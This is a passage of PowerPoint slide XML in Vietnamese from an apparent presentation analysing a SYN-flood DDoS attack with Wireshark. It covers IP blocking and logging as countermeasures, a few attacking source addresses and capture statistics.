              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lượng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lồ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tổn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lớn</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doanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiệp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bước</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngăn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chặn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rút</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</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DDOS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</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phần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mềm</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bắt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</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gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>liên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tục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ngăn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chặn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đó</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin log ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhiều</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tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>liên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tục</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tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dừng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhận</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 22000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhiều</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khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</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thường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request 1-&gt;4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</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khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nguồn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kê</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>157.118.235.25, 212.192.252.231, 171.93.83.152,…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222346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29C14-CF69-4F98-90CF-8202522C0DC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="242371"/>
            <a:ext cx="10224582" cy="6470317"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Thống kê</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> tin chi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tiết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Thu thập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Gói tin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: Đã thu thập 22,070 gói tin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: Đã thu thập 1,191,684 byte dữ liệu.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Hiển thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Gói tin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: Đã hiển thị 21,894 gói tin sau khi lọc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: Đã hiển thị 1,182,276 byte dữ liệu.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Đánh dấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: Không có gói tin nào được đánh dấu.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Khoảng thời gian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Thu thập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 174.881 giây (thời gian tổng cộng của quá trình thu thập).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Hiển thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 171.297 giây (thời gian của các gói tin được hiển thị).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Trung bình gói tin/s (pps)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Thu thập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 126.2 gói tin/giây.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Hiển thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 127.8 gói tin/giây.</a:t>
            </a:r>
          </a:p>
          <a:p>
